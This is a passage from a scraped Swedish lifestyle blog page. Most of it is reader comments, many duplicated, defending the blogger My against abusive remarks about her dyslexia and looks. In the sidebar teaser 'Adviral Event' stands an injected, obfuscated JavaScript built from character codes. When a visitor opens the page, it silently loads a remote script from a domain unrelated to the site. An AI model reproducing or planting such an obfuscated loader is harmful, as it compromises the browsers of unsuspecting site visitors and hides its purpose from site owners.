  Kämpa på och du är ju en förebild för dem med samma ”diagnos” och andra. Måste allt vara perfekt, ja i en högskoleuppsats med komman, punkter, rättstavat och mellanslag på rätt ställen. Men detta är ju din blogg!
  Kram

 63. Jag blir så ARG när jag läser va folk skriver så taskigt. My är underbar person 😘 Jag själv har samma handikapp, blir så lesen nu av att läsa detta. Jag älskar MY ❤❤❤❤❤

 64. Har inga problem att förstå dina texter! Jäkla fjanterier att ens kommentera stavfel, då du förklarat din dyslexi för oss läsare vid flera tillfällen. Absolut inget du behöver förklara mer eller be om ursäkt för! Fortsätt vara precis som den du är, både för dig själv och framförallt för din fina son.

 65. Hej My!

  Hoppas du inte tar åt dig av de elaka kommentarerna. Svårt att kanske inte göra det men trösta dig med att HELLRE DYSLEXI än oempatisk , elak människa. Jag har hellre dyslexi 1000 gånger om än att skriva såna elakheter som en del gjort till dig. Alla de måste ha tragiska liv och upplevt massa skit som barn. Det är iof sorgligt men går att göra något åt. Människor som är elaka och måste trycka ner andra för att höja sig själva är farliga men egentligen ska vi bara tycka synd om dem. Hoppas de får hjälp och att DU står på dig och bär huvudet högt.

  Kram Em

 66. Hej jag undrar om alla dom här kommentarer står här i komentarsfältet?Läser dom flesta kommentarer men har inte sett några komentarer som dom här .Ha en bra kväll 💕

 67. Hejsan, hoppas verkligen att du inte tar åt dig av dessa hemska kommentarer du får på din blogg.
  Förstår inte denna hets mot dig, varför läser dom din blogg om dom inte tycker om den……fattar ingenting faktiskt.
  Förstårr inte heller denna hets om särskrivning, visst det kan bli fel och rätt kul fel ibland men jösses man fattar ju ändå vad folk menar. Ett gott skratt förlänger livet, ta det på det sättet så blir livet mycket roligare.
  Mer värme åt folket och tänk på vilken dag det är i dag, vi kvinnor måste bli snällare mot varandra annars blir vi aldrig starka.

  Kramar från Millan

 68. Usch ibland blir jag mörkrädd hur mycket ondska det finns i samhället ☹️ Om man kan läsa o läser hela texten i ett sammanhang, så tycker inte det är svårt att tolka vad där står. Och så många fel är det för den delen inte ? Det är ju charmen med dig My att du står för den du är ? Att alla duger som man är, utan att kobror ska hugga så fort ett litet tillfälle ges ?
  Kram på dig för att du är du ❤

 69. Men vad är det för fel på människor så dj avundsjuka för du har lyckats så bra stå på dig och njut av att du är bäst på det du gör kramisar 😀 😀 😍 😍

 70. Att du har dyslexi har du berättat om förut och som du skrev står det i din inledning.
  Får du fortfarande sådana kommentarer från ynkliga människor som inte vet bättre!
  Kämpa på och du är ju en förebild för dem med samma ”diagnos” och andra. Måste allt vara perfekt, ja i en högskoleuppsats med komman, punkter, rättstavat och mellanslag på rätt ställen. Men detta är ju din blogg!
  Kram

 71. Har inga problem att förstå dina texter! Jäkla fjanterier att ens kommentera stavfel, då du förklarat din dyslexi för oss läsare vid flera tillfällen. Absolut inget du behöver förklara mer eller be om ursäkt för! Fortsätt vara precis som den du är, både för dig själv och framförallt för din fina son.

 72. Usch ibland blir jag mörkrädd hur mycket ondska det finns i samhället ☹️ Om man kan läsa o läser hela texten i ett sammanhang, så tycker inte det är svårt att tolka vad där står. Och så många fel är det för den delen inte 😄 Det är ju charmen med dig My att du står för den du är 😄 Att alla duger som man är, utan att kobror ska hugga så fort ett litet tillfälle ges 🐍
  Kram på dig för att du är du ❤

 73. Men alltså helt seriöst, tror folk att man kan få lov att vräka ur sig precis vad som helst till nån som har en blogg och som valt att vara ”offentlig”.
  Det är mammor, lärare osv jag blir rädd och ledsen att vi kvinnor trycker ner varandra , vi borde stötta varandra, framsnacka varandra,vara genuint glada åt varandras framgångar!
  Och vem bestämmer att My inte kan vara skribent, trendspanare och pt för att hon är för tjock?
  Å skriva att hon är fet och ful… snälla alltså jag har inga kommentarer!
  Å skriva att nån ska gå å dö…. inga ord!!
  Nej, jag har inte dyslexi, skriver å blandar ord efter 18 år i Norge ?

 74. Äsch My – strunta i dom där tanterna. Vi fattar vad du menar.
  Dock har jag faktiskt tänkt ibland att jag själv skulle kunna gå in och redigera dina inlägg. Det är så lätt gjort för någon som inte har Dyslexi och ibland undrar jag varför du inte har den tjänsten när du ändå köper in fotografer och sånt. Bara en fundering. Tar kanske max 3 minuter för en med normal textförståelse att granska ett genomsnittligt stor inlägg från dig. Så slipper du all denna skit och bloggen blir lite ”finare”.

 75. Antar att du bara kopierade in kommentarerna du fått, för isf kan du ju hälsa åtminstone två av dem att de inte kan stava själva:-) men du däremot stavas ju bättre än de flesta Me dyslexi som jag känner! Så kämpa på!

 76. Men alltså helt seriöst, tror folk att man kan få lov att vräka ur sig precis vad som helst till nån som har en blogg och som valt att vara ”offentlig”.
  Det är mammor, lärare osv jag blir rädd och ledsen att vi kvinnor trycker ner varandra , vi borde stötta varandra, framsnacka varandra,vara genuint glada åt varandras framgångar!
  Och vem bestämmer att My inte kan vara skribent, trendspanare och pt för att hon är för tjock?
  Å skriva att hon är fet och ful… snälla alltså jag har inga kommentarer!
  Å skriva att nån ska gå å dö…. inga ord!!
  Nej, jag har inte dyslexi, skriver å blandar ord efter 18 år i Norge 🙂

 77. Äsch My – strunta i dom där tanterna. Vi fattar vad du menar.

  Dock har jag faktiskt tänkt ibland att jag själv skulle kunna gå in och redigera dina inlägg. Det är så lätt gjort för någon som inte har Dyslexi och ibland undrar jag varför du inte har den tjänsten när du ändå köper in fotografer och sånt. Bara en fundering. Tar kanske max 3 minuter för en med normal textförståelse att granska ett genomsnittligt stor inlägg från dig. Så slipper du all denna skit och bloggen blir lite ”finare”.

 78. Antar att du bara kopierade in kommentarerna du fått, för isf kan du ju hälsa åtminstone två av dem att de inte kan stava själva:-) men du däremot stavas ju bättre än de flesta Me dyslexi som jag känner! Så kämpa på!

 79. Blir så arg på alla dumma människor! Har de inget bättre för sig än att göra ner andra!?
  Du är fantastisk My! Fortsätt vara en förebild. Du gör skillnad för många.
  Kram

 80. Blir så arg på alla dumma människor! Har de inget bättre för sig än att göra ner andra!?
  Du är fantastisk My! Fortsätt vara en förebild. Du gör skillnad för många.
  Kram

 81. Herrejösses!!
  Man blir ju mörkrädd alltså!!
  Men dessa personer som sätter fingrarna så snabbt på tangentbordet för att medvetet vara elak mot en människa (eller säkert flera människor ) som de aldrig har träffat, dessa människorna är små människor, rädda människor, avundsjuka människor och förmodligen så vågar de inte ens säga flaskhals till en enda människa IRL. Jag skulle kunna säga att du inte ska bry dig men jag vet att man gör ju det ändå… Man får bara försöka att ställa sig över det så gott det går!! Personligen så känns det för mig som en lättnad att se att jag inte är ensam med felstavningar och särskrivningar! ? Kram

 82. Jag kan inte låta bli att småle när jag läser kommentarerna du fått om felstavningar.
  Inte ETT enda inlägg är felfritt ?. Det är stavfel, särskrivningsfel, liten bokstav där det ska vara stor och så vidare. Till och med den så kallade läraren som kallar sig rättstavningspolis har två fel i sitt inlägg. Det heter ”sådana” inte ”såna” och det heter ”dina” inlägg inte ”din”. Kanske något att begrunda hur lätt det kan bli fel, även om man klankar på andra om stavningsfel. Sedan tycker jag det är bedrövligt att skriva så elaka inlägg med att kalla någon vid könsord, klaga på utseende och så vidare. Horribelt är det att säga att någon ska dö. Jag tycker det säger en hel del om intelligensen om den personen .

 83. Jag ser det mer som en felskrivning när jag ser ord som är felstavade. Jag har inte dyslexi men slinter ofta med fingret när jag skriver och inte kollar så noga. Så skriv som du vill My !! Kram

 84. Herrejösses!!
  Man blir ju mörkrädd alltså!!
  Men dessa personer som sätter fingrarna så snabbt på tangentbordet för att medvetet vara elak mot en människa (eller säkert flera människor ) som de aldrig har träffat, dessa människorna är små människor, rädda människor, avundsjuka människor och förmodligen så vågar de inte ens säga flaskhals till en enda människa IRL. Jag skulle kunna säga att du inte ska bry dig men jag vet att man gör ju det ändå… Man får bara försöka att ställa sig över det så gott det går!! Personligen så känns det för mig som en lättnad att se att jag inte är ensam med felstavningar och särskrivningar! 🙂 Kram

 85. Jag kan inte låta bli att småle när jag läser kommentarerna du fått om felstavningar.
  Inte ETT enda inlägg är felfritt ;). Det är stavfel, särskrivningsfel, liten bokstav där det ska vara stor och så vidare. Till och med den så kallade läraren som kallar sig rättstavningspolis har två fel i sitt inlägg. Det heter ”sådana” inte ”såna” och det heter ”dina” inlägg inte ”din”. Kanske något att begrunda hur lätt det kan bli fel, även om man klankar på andra om stavningsfel. Sedan tycker jag det är bedrövligt att skriva så elaka inlägg med att kalla någon vid könsord, klaga på utseende och så vidare. Horribelt är det att säga att någon ska dö. Jag tycker det säger en hel del om intelligensen om den personen .

 86. Jag ser det mer som en felskrivning när jag ser ord som är felstavade. Jag har inte dyslexi men slinter ofta med fingret när jag skriver och inte kollar så noga. Så skriv som du vill My !! Kram

 87. Fina My
  Strunta i dom kommentarerna, dom kan ju inte stava själva plus att någon särskrev. Dom sitter där bakom sina skärmar och påpekar sådant dom har problem med själva.
  Är det något jag tycker illa om så är det folk som dömer, som så fort dom ser minsta lilla fel…så är dom genast framme och dömer. Skäms på er! Är ni så perfekta själva? Tror inte det då den helt perfekta och felfria människan inte är född än. Alla har sina fel och brister.
  Varm kram till dig My

 88. Fina My
  Strunta i dom kommentarerna, dom kan ju inte stava själva plus att någon särskrev. Dom sitter där bakom sina skärmar och påpekar sådant dom har problem med själva.
  Är det något jag tycker illa om så är det folk som dömer, som så fort dom ser minsta lilla fel…så är dom genast framme och dömer. Skäms på er! Är ni så perfekta själva? Tror inte det då den helt perfekta och felfria människan inte är född än. Alla har sina fel och brister.
  Varm kram till dig My

 89. Hej!
  Helt klart har de som skriver inläggen du publicerat överst allvarliga problem. Det är de som skall skämmas!!! Man väljer ju själv vad man läser, gör och säger. Blir mörkrädd av att se respektlösheten människor emellan. Jag läser din blogg ibland när det handlar om något intressant. Om inte så läser jag ej.
  Kram till dig

 90. Hej!
  Helt klart har de som skriver inläggen du publicerat överst allvarliga problem. Det är de som skall skämmas!!! Man väljer ju själv vad man läser, gör och säger. Blir mörkrädd av att se respektlösheten människor emellan. Jag läser din blogg ibland när det handlar om något intressant. Om inte så läser jag ej.
  Kram till dig

 91. Så hemskt att läsa kommentarerna du fått!
  Fattar inte hur folk kan vara så råa och otrevliga på nätet.
  Kämpa på. Jag läser din blogg då och då och gillar din stil.
  Kram Mats, tränar på SATS Märsta ?

 92. Så hemskt att läsa kommentarerna du fått!
  Fattar inte hur folk kan vara så råa och otrevliga på nätet.
  Kämpa på. Jag läser din blogg då och då och gillar din stil.
  Kram Mats, tränar på SATS Märsta 🙂

 93. Hej fina My!
  Du är inte ensam! Finns funktionsnedsättningar överallt, av olika slag. Du behöver stavningsprogam – so what+ att du skriver!!!
  STYRKA!
  Själv skriver jag snabbt, rappt ( vänder på n & g) och VÄNDER på dem – så genant.
  Jag kan bara föröka korrekturläsa, korrigera och ändra innan publicering…. gör det inte med flit som många tror utan det går av auto, tyvärr!
  Tacksam för din blogg om vardag, utmaningar mm.
  Fortsätt blogga och skit i ”TROLLEN”. Kram. Åsa

 94. Hej fina My!
  Du är inte ensam! Finns funktionsnedsättningar överallt, av olika slag. Du behöver stavningsprogam – so what+ att du skriver!!!
  STYRKA!
  Själv skriver jag snabbt, rappt ( vänder på n & g) och VÄNDER på dem – så genant.
  Jag kan bara föröka korrekturläsa, korrigera och ändra innan publicering…. gör det inte med flit som många tror utan det går av auto, tyvärr!
  Tacksam för din blogg om vardag, utmaningar mm.
  Fortsätt blogga och skit i ”TROLLEN”. Kram. Åsa

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/